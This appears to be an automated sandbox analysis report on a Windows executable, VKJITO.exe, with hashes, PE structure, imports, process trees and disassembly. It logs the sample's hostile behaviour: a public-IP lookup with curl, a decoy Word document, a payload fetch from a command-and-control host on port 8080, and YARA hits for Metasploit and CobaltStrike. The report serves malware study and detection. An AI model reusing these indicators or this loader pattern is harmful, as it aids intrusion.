                                    SHA-256:2EAB01B8FF842C20EF09188441D2AAE9A4F9521ED3EF04CB46BE0BE6AC5E89F1
                                    SHA-512:EE230B256B8E2FD5844541A53ED40B8746497F36770AAB224B3DAEB303D9C7976264F03A49B35A40AFBF0CD3FC7C6168EC257BD794567733B2F887B32E95323E
                                    Malicious:false
                                    Preview:..........................................................N.@|.I~b...........[Content_Types].xml...n.0.E......Ub.*..>.-....3..~.`Q........#...S.}.j.....SS..=Wj

                                    C:\Windows\appcompat\Programs\Amcache.hve

                                    Download File
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):1835008
                                    Entropy (8bit):4.4217052044964795
                                    Encrypted:false
                                    SSDEEP:6144:3Svfpi6ceLP/9skLmb0OTcWSPHaJG8nAgeMZMMhA2fX4WABlEnNv0uhiTw:ivloTcW+EZMM6DFyh03w
                                    MD5:4740B203CC7FA943AC336560F236711D
                                    SHA1:D94163BA7F8229CE0730540738C15DF695A0F29F
                                    SHA-256:EE4902ADDC52700A85960FC3939E2F414F5398BCE2341D532DEE368288192399
                                    SHA-512:E8061983DAAB7A98D7335A45132F1E0EE0886842B84562DB471A3B39322FABEBE054457EC8AE8BE2B4F7EDA008AD25FA0F4557A60B538287BF1E4EFA87976D3F
                                    Malicious:false
                                    Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmJi..`Q..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    Static File Info

                                    General

                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                    Entropy (8bit):6.476037002247636
                                    TrID:
                                    • Win64 Executable GUI (202006/5) 92.65%
                                    • Win64 Executable (generic) (12005/4) 5.51%
                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                    • DOS Executable Generic (2002/1) 0.92%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:VKJITO.exe
                                    File size:505'856 bytes
                                    MD5:34bfa047aaca8fd4dc99759ebf0e1a6a
                                    SHA1:ae43a10d462f09aa7b945b5b37aad9c0d1df4b01
                                    SHA256:517b6b3e890f7b93e0006cd8486b778075ebcc647565d37f2186500a8ddc1ff7
                                    SHA512:aa82c0becd41cb8bd5ef45a352fcf4e7432495041d0b36687f02bb95705e61fa017b018a016c615271c7d670cef113bbe87285baebf2d0de2e845c18f1270939
                                    SSDEEP:6144:/6WW4uEbwm8kZ/w2FmOblG/h88OfGJUiuWtgPleGJEdpVNeOo:/6VYdNpmKlG5XqJGgPkG
                                    TLSH:F9B4E9316A1524B9E2EAC0744249856365397C8DD729B9FB01E4B2342FB7FF71B3A60C
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n(^..{^..{^..{W..{R..{O&.z\..{O&.z]..{O&.zW..{O&.zI..{...zV..{...zE..{^..{'..{^..{...{.&.{_..{.&.z_..{Rich^..{...............

                                    File Icon

                                    Icon Hash:0b03084c4e4e0383

                                    Static PE Info

                                    General

                                    Entrypoint:0x14004a5b0
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x140000000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x67610374 [Tue Dec 17 04:52:04 2024 UTC]
                                    TLS Callbacks:0x4000d750, 0x1, 0x4003a6f0, 0x1
                                    CLR (.Net) Version:
                                    OS Version Major:6
                                    OS Version Minor:0
                                    File Version Major:6
                                    File Version Minor:0
                                    Subsystem Version Major:6
                                    Subsystem Version Minor:0
                                    Import Hash:e181d703c1ccac643c75df695343568f

                                    Entrypoint Preview

                                    Instruction
                                    dec eax
                                    sub esp, 28h
                                    call 00007FA4BD1A5208h
                                    dec eax
                                    add esp, 28h
                                    jmp 00007FA4BD1A4D97h
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    nop word ptr [eax+eax+00000000h]
                                    dec eax
                                    sub esp, 10h
                                    dec esp
                                    mov dword ptr [esp], edx
                                    dec esp
                                    mov dword ptr [esp+08h], ebx
                                    dec ebp
                                    xor ebx, ebx
                                    dec esp
                                    lea edx, dword ptr [esp+18h]
                                    dec esp
                                    sub edx, eax
                                    dec ebp
                                    cmovb edx, ebx
                                    dec esp
                                    mov ebx, dword ptr [00000010h]
                                    dec ebp
                                    cmp edx, ebx
                                    jnc 00007FA4BD1A4F38h
                                    inc cx
                                    and edx, 8D4DF000h
                                    wait
                                    add al, dh

                                    Rich Headers

                                    Programming Language:
                                    • [IMP] VS2008 SP1 build 30729

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x66f340x104.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x6c0000x10b40.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x690000x2ec8.pdata
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x7d0000x90c.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x5f5500x54.rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x5f6000x28.rdata
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5f4100x140.rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x4e0000x450.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x4cb810x4cc0059e645b10daf9e13e7e0365f93b46854False0.519213151465798data6.410429474183223IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x4e0000x19f800x1a000d200ec812104f6b1e56c44927cc03075False0.39791165865384615data5.929914038965162IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x680000x4c00x200b0a52caa26824fe2292684499e256f5cFalse0.287109375data2.3402856607159674IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .pdata0x690000x2ec80x30002f14aae3a7cccffffd7fde4a327f957bFalse0.50146484375data5.598549220182398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .rsrc0x6c0000x10b400x10c00c9ba3dce4a01b0233a1ee90428fde01fFalse0.06862173507462686data4.631565874341215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x7d0000x90c0xa0005d74b2675f47a61dea3c5e26b019d48False0.5828125data5.226710425977709IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x6c0e80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 15118 x 15118 px/mEnglishUnited States0.06374955637051934
                                    RT_GROUP_ICON0x7c9100x14dataEnglishUnited States1.15
                                    RT_VERSION0x7c9240x21cdataEnglishUnited States0.5148148148148148

                                    Imports

                                    DLLImport
                                    bcrypt.dllBCryptGenRandom
                                    KERNEL32.dllSetLastError, lstrlenW, GetModuleHandleW, FormatMessageW, HeapAlloc, GetProcessHeap, GetCurrentDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, WaitForSingleObjectEx, LoadLibraryA, GetCurrentProcess, GetCurrentProcessId, CreateMutexA, ReleaseMutex, RtlVirtualUnwind, WideCharToMultiByte, GetEnvironmentVariableW, CreateFileW, SetFileInformationByHandle, IsDebuggerPresent, VirtualProtect, VirtualAlloc, ConvertThreadToFiber, CreateFiber, SwitchToFiber, ReleaseSRWLockExclusive, FreeEnvironmentStringsW, DeleteProcThreadAttributeList, CompareStringOrdinal, QueryPerformanceCounter, AcquireSRWLockExclusive, GetEnvironmentStringsW, DuplicateHandle, WriteFileEx, SleepEx, GetExitCodeProcess, TryAcquireSRWLockExclusive, QueryPerformanceFrequency, AcquireSRWLockShared, ReleaseSRWLockShared, CreateEventW, ReadFile, GetOverlappedResult, CancelIo, GetLastError, GetProcAddress, ExitProcess, GetFullPathNameW, CreateNamedPipeW, ReadFileEx, WaitForMultipleObjects, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, CreateThread, GetSystemTimeAsFileTime, HeapReAlloc, GetModuleHandleA, WriteConsoleW, MultiByteToWideChar, GetConsoleMode, GetModuleFileNameW, HeapFree, GetCurrentThread, SetThreadStackGuarantee, AddVectoredExceptionHandler, Sleep, CloseHandle, WaitForSingleObject, SetWaitableTimer, SetUnhandledExceptionFilter, CreateWaitableTimerExW, UnhandledExceptionFilter, InitializeSListHead, GetCurrentThreadId, GetStdHandle, IsProcessorFeaturePresent
                                    ADVAPI32.dllRegQueryValueExW, SystemFunction036, RegCloseKey, RegOpenKeyExW
                                    api-ms-win-core-synch-l1-2-0.dllWakeByAddressAll, WakeByAddressSingle, WaitOnAddress
                                    ntdll.dllRtlNtStatusToDosError, NtReadFile, NtWriteFile
                                    VCRUNTIME140.dll__current_exception, __C_specific_handler, __current_exception_context, memmove, __CxxFrameHandler3, memset, memcmp, memcpy, _CxxThrowException
                                    api-ms-win-crt-string-l1-1-0.dllstrlen
                                    api-ms-win-crt-heap-l1-1-0.dllfree, _set_new_mode
                                    api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                    api-ms-win-crt-runtime-l1-1-0.dll__p___argv, __p___argc, _cexit, exit, _initterm_e, _initterm, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, _c_exit, _set_app_type, _seh_filter_exe, _register_thread_local_exe_atexit_callback, terminate, _crt_atexit, _initialize_onexit_table, _register_onexit_function, _exit
                                    api-ms-win-crt-stdio-l1-1-0.dll__p__commode, _set_fmode
                                    api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 18, 2024 16:23:14.099164009 CET4970680192.168.2.5104.26.12.31
                                    Dec 18, 2024 16:23:14.218908072 CET8049706104.26.12.31192.168.2.5
                                    Dec 18, 2024 16:23:14.222798109 CET4970680192.168.2.5104.26.12.31
                                    Dec 18, 2024 16:23:14.223151922 CET4970680192.168.2.5104.26.12.31
                                    Dec 18, 2024 16:23:14.342947960 CET8049706104.26.12.31192.168.2.5
                                    Dec 18, 2024 16:23:15.490381956 CET8049706104.26.12.31192.168.2.5
                                    Dec 18, 2024 16:23:15.496172905 CET4970680192.168.2.5104.26.12.31
                                    Dec 18, 2024 16:23:15.623450994 CET8049706104.26.12.31192.168.2.5
                                    Dec 18, 2024 16:23:15.623600006 CET4970680192.168.2.5104.26.12.31
                                    Dec 18, 2024 16:23:16.119896889 CET497078080192.168.2.5139.159.139.109
                                    Dec 18, 2024 16:23:16.239733934 CET808049707139.159.139.109192.168.2.5
                                    Dec 18, 2024 16:23:16.239875078 CET497078080192.168.2.5139.159.139.109
                                    Dec 18, 2024 16:23:16.246674061 CET497078080192.168.2.5139.159.139.109
                                    Dec 18, 2024 16:23:16.366442919 CET808049707139.159.139.109192.168.2.5
                                    Dec 18, 2024 16:23:18.873686075 CET808049707139.159.139.109192.168.2.5
                                    Dec 18, 2024 16:23:18.873788118 CET497078080192.168.2.5139.159.139.109
                                    Dec 18, 2024 16:23:18.873902082 CET497078080192.168.2.5139.159.139.109
                                    Dec 18, 2024 16:23:18.994864941 CET808049707139.159.139.109192.168.2.5

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 18, 2024 16:23:13.853003979 CET4967553192.168.2.51.1.1.1
                                    Dec 18, 2024 16:23:14.093669891 CET53496751.1.1.1192.168.2.5

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Dec 18, 2024 16:23:13.853003979 CET192.168.2.51.1.1.10x82bcStandard query (0)ip.sbA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Dec 18, 2024 16:23:14.093669891 CET1.1.1.1192.168.2.50x82bcNo error (0)ip.sb104.26.12.31A (IP address)IN (0x0001)false
                                    Dec 18, 2024 16:23:14.093669891 CET1.1.1.1192.168.2.50x82bcNo error (0)ip.sb104.26.13.31A (IP address)IN (0x0001)false
                                    Dec 18, 2024 16:23:14.093669891 CET1.1.1.1192.168.2.50x82bcNo error (0)ip.sb172.67.75.172A (IP address)IN (0x0001)false
                                    Dec 18, 2024 16:23:41.674988985 CET1.1.1.1192.168.2.50x8ef1No error (0)templatesmetadata.office.nettemplatesmetadata.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • ip.sb
                                    • 139.159.139.109:8080

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.549706104.26.12.31804068C:\Windows\System32\curl.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 18, 2024 16:23:14.223151922 CET69OUTGET / HTTP/1.1
                                    Host: ip.sb
                                    User-Agent: curl/7.83.1
                                    Accept: */*
                                    Dec 18, 2024 16:23:15.490381956 CET781INHTTP/1.1 200 OK
                                    Date: Wed, 18 Dec 2024 15:23:15 GMT
                                    Content-Type: text/plain
                                    Content-Length: 13
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ozhMAtkqD15Y9fOQUlKGEUWCLf1fCdfplBjONcqXZXVb5jZzwpt2lFz00iMjht3c5tRzmh%2FpXG%2FiygSQi2swYoZUS6uCj0S%2B%2FU6biH89Z1F8DKwAjwp"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8f40272bb8e41865-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=3038&min_rtt=3038&rtt_var=1519&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=69&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                    Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a
                                    Data Ascii: 8.46.123.189


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.549707139.159.139.10980803056C:\Users\user\Desktop\VKJITO.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 18, 2024 16:23:16.246674061 CET163OUTGET /uz68 HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
                                    Host: 139.159.139.109:8080
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:10:23:12
                                    Start date:18/12/2024
                                    Path:C:\Users\user\Desktop\VKJITO.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\VKJITO.exe"
                                    Imagebase:0x7ff7d4310000
                                    File size:505'856 bytes
                                    MD5 hash:34BFA047AACA8FD4DC99759EBF0E1A6A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:1
                                    Start time:10:23:12
                                    Start date:18/12/2024
                                    Path:C:\Windows\System32\curl.exe
                                    Wow64 process (32bit):false
                                    Commandline:"curl" ip.sb
                                    Imagebase:0x7ff7f0bf0000
                                    File size:530'944 bytes
                                    MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:10:23:12
                                    Start date:18/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:4
                                    Start time:10:23:14
                                    Start date:18/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"cmd" /c start C:\Users\user\Desktop\???????.docx
                                    Imagebase:0x7ff7c8390000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:10:23:14
                                    Start date:18/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:10:23:14
                                    Start date:18/12/2024
                                    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o ""
                                    Imagebase:0x860000
                                    File size:1'620'872 bytes
                                    MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:9
                                    Start time:10:23:18
                                    Start date:18/12/2024
                                    Path:C:\Windows\System32\WerFault.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 3056 -s 1076
                                    Imagebase:0x7ff6d9f90000
                                    File size:570'736 bytes
                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:2.6%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:31.9%
                                      Total number of Nodes:618
                                      Total number of Limit Nodes:36
                                      execution_graph 27654 7ff7d4348c3a 27657 7ff7d4340700 27654->27657 27656 7ff7d4348c97 27658 7ff7d434071f 27657->27658 27660 7ff7d4340781 27658->27660 27669 7ff7d4342190 27658->27669 27660->27656 27661 7ff7d4340857 CreateFileW 27663 7ff7d43408e7 GetLastError 27661->27663 27664 7ff7d434089c 27661->27664 27662 7ff7d4340754 27662->27660 27662->27661 27663->27660 27664->27660 27665 7ff7d43408ab GetLastError 27664->27665 27665->27660 27666 7ff7d43408b8 SetFileInformationByHandle 27665->27666 27666->27660 27667 7ff7d4340929 GetLastError CloseHandle 27666->27667 27668 7ff7d4340948 27667->27668 27668->27660 27671 7ff7d43421ca 27669->27671 27670 7ff7d43423a4 SetLastError GetFullPathNameW 27670->27671 27672 7ff7d43423cf GetLastError 27670->27672 27671->27670 27674 7ff7d43423e4 GetLastError 27671->27674 27676 7ff7d4342412 27671->27676 27682 7ff7d4342236 27671->27682 27672->27671 27673 7ff7d4342457 GetLastError 27672->27673 27673->27682 27674->27671 27675 7ff7d4342855 27674->27675 27686 7ff7d435c330 6 API calls 27675->27686 27678 7ff7d434286f 27676->27678 27684 7ff7d434241b 27676->27684 27687 7ff7d435c780 6 API calls 27678->27687 27680 7ff7d434277f memmove 27680->27682 27681 7ff7d434252f 27681->27680 27685 7ff7d434286d 27681->27685 27682->27662 27683 7ff7d4342694 memmove 27683->27681 27684->27681 27684->27683 27684->27685 27685->27662 27688 7ff7d435a434 27689 7ff7d435a44d 27688->27689 27690 7ff7d435a58b 27689->27690 27691 7ff7d435a455 __scrt_acquire_startup_lock 27689->27691 27730 7ff7d435a9c0 9 API calls 27690->27730 27693 7ff7d435a595 27691->27693 27699 7ff7d435a473 __scrt_release_startup_lock 27691->27699 27731 7ff7d435a9c0 9 API calls 27693->27731 27695 7ff7d435a5a0 27697 7ff7d435a5a8 _exit 27695->27697 27696 7ff7d435a498 27698 7ff7d435a51e _get_initial_narrow_environment __p___argv __p___argc 27708 7ff7d43118b0 AddVectoredExceptionHandler SetThreadStackGuarantee GetCurrentThread SetThreadDescription 27698->27708 27699->27696 27699->27698 27703 7ff7d435a516 _register_thread_local_exe_atexit_callback 27699->27703 27703->27698 27704 7ff7d435a547 27704->27695 27705 7ff7d435a54b 27704->27705 27706 7ff7d435a555 27705->27706 27707 7ff7d435a550 _cexit 27705->27707 27706->27696 27707->27706 27709 7ff7d4311922 27708->27709 27710 7ff7d4311949 27708->27710 27709->27710 27712 7ff7d4311acb 27709->27712 27732 7ff7d4321850 27710->27732 27744 7ff7d435b720 21 API calls 27712->27744 27715 7ff7d4311ad2 27745 7ff7d435b06a 21 API calls 27715->27745 27717 7ff7d431197d 27719 7ff7d4311a2f 27717->27719 27741 7ff7d431c600 21 API calls 27717->27741 27738 7ff7d4311000 27719->27738 27722 7ff7d4311a22 27742 7ff7d431c7c0 HeapFree 27722->27742 27727 7ff7d4311abf 27729 7ff7d435ab10 GetModuleHandleW 27727->27729 27729->27704 27730->27693 27731->27695 27733 7ff7d432186d GetProcessHeap 27732->27733 27734 7ff7d4321863 HeapAlloc 27732->27734 27736 7ff7d435be29 HeapAlloc 27733->27736 27737 7ff7d4311974 27733->27737 27734->27733 27736->27737 27737->27715 27737->27717 27746 7ff7d4311224 27738->27746 27739 7ff7d4311006 27739->27727 27743 7ff7d435b770 WaitOnAddress GetLastError WakeByAddressAll 27739->27743 27741->27722 27742->27719 27743->27727 27799 7ff7d43110dc 27746->27799 27749 7ff7d4311269 27805 7ff7d4311c90 27749->27805 27750 7ff7d431165c 27912 7ff7d435c005 21 API calls 27750->27912 27753 7ff7d431166f 27913 7ff7d435c005 21 API calls 27753->27913 27754 7ff7d4311285 27755 7ff7d43110dc 21 API calls 27754->27755 27758 7ff7d43116f8 27754->27758 27757 7ff7d43112b5 27755->27757 27757->27753 27762 7ff7d43112cb 27757->27762 27917 7ff7d435b200 21 API calls 27758->27917 27759 7ff7d431140d 27768 7ff7d431145c 27759->27768 27914 7ff7d435b770 WaitOnAddress GetLastError WakeByAddressAll 27759->27914 27761 7ff7d4311568 27918 7ff7d435b580 21 API calls 27761->27918 27813 7ff7d4325000 27762->27813 27770 7ff7d43116ee 27768->27770 27771 7ff7d43116e2 27768->27771 27774 7ff7d43114c1 27768->27774 27916 7ff7d435b720 21 API calls 27770->27916 27915 7ff7d435bc80 WaitOnAddress GetLastError 27771->27915 27774->27761 27778 7ff7d431152e 27774->27778 27784 7ff7d431156d 27774->27784 27775 7ff7d431130c 27776 7ff7d4311c90 22 API calls 27775->27776 27777 7ff7d4311366 27776->27777 27777->27758 27863 7ff7d4325220 strlen 27777->27863 27779 7ff7d43115c2 27778->27779 27780 7ff7d4311537 27778->27780 27782 7ff7d43115eb 27779->27782 27787 7ff7d43115e1 WakeByAddressSingle 27779->27787 27909 7ff7d435b200 21 API calls 27780->27909 27782->27758 27788 7ff7d43115f4 27782->27788 27784->27779 27785 7ff7d43115b6 27784->27785 27910 7ff7d4311ba0 HeapFree 27784->27910 27911 7ff7d4311ba0 HeapFree 27785->27911 27786 7ff7d431138d 27792 7ff7d4311398 CreateWaitableTimerExW 27786->27792 27787->27782 27904 7ff7d4324ee0 27788->27904 27794 7ff7d43113b1 SetWaitableTimer 27792->27794 27795 7ff7d4311404 Sleep 27792->27795 27793 7ff7d431163d 27793->27739 27796 7ff7d43113fb CloseHandle 27794->27796 27797 7ff7d43113dd WaitForSingleObject CloseHandle 27794->27797 27795->27759 27796->27795 27797->27759 27798 7ff7d43113f9 27797->27798 27798->27795 27800 7ff7d43110f7 27799->27800 27804 7ff7d4311119 27799->27804 27802 7ff7d431112e 27800->27802 27803 7ff7d4321850 3 API calls 27800->27803 27800->27804 27802->27749 27802->27750 27803->27804 27804->27802 27919 7ff7d435b050 21 API calls 27804->27919 27806 7ff7d4321850 3 API calls 27805->27806 27807 7ff7d4311cbd 27806->27807 27808 7ff7d4311d3b 27807->27808 27809 7ff7d4311cc2 memmove 27807->27809 27920 7ff7d435b050 21 API calls 27808->27920 27810 7ff7d4311cd9 27809->27810 27810->27754 27814 7ff7d4325026 27813->27814 27816 7ff7d4325175 27813->27816 27815 7ff7d43250a4 strlen 27814->27815 27814->27816 27817 7ff7d43250d2 27814->27817 27815->27814 27816->27775 27821 7ff7d4325149 27817->27821 27921 7ff7d432ceb0 27817->27921 27949 7ff7d432d8c0 20 API calls 27817->27949 27950 7ff7d432d4f0 RegQueryValueExW RegOpenKeyExW RegCloseKey 27817->27950 27821->27816 27944 7ff7d433c890 27821->27944 27823 7ff7d432dcbb 27824 7ff7d4338570 12 API calls 27823->27824 27825 7ff7d432dcf8 27824->27825 27826 7ff7d433bcf0 6 API calls 27825->27826 27828 7ff7d432dd01 27825->27828 27826->27828 27827 7ff7d4337f90 12 API calls 27829 7ff7d432dd9e 27827->27829 27828->27827 27834 7ff7d432df50 27828->27834 27830 7ff7d432ddab 27829->27830 27831 7ff7d432df7f 27829->27831 27832 7ff7d433c230 7 API calls 27830->27832 27833 7ff7d435c660 6 API calls 27831->27833 27835 7ff7d432dde2 27832->27835 27840 7ff7d432dfb2 27833->27840 27834->27775 27836 7ff7d43385b0 24 API calls 27835->27836 27837 7ff7d432de05 27836->27837 27838 7ff7d432dfb7 27837->27838 27839 7ff7d432de0e 27837->27839 27841 7ff7d435c660 6 API calls 27838->27841 27842 7ff7d43440e0 memmove 27839->27842 27840->27775 27841->27840 27843 7ff7d432de27 memmove 27842->27843 27844 7ff7d432de53 27843->27844 27845 7ff7d432dfeb 27844->27845 27846 7ff7d432de61 27844->27846 27847 7ff7d435c330 6 API calls 27845->27847 27848 7ff7d43441d0 memmove 27846->27848 27847->27840 27849 7ff7d432de85 27848->27849 27850 7ff7d43441d0 memmove 27849->27850 27851 7ff7d432de9b 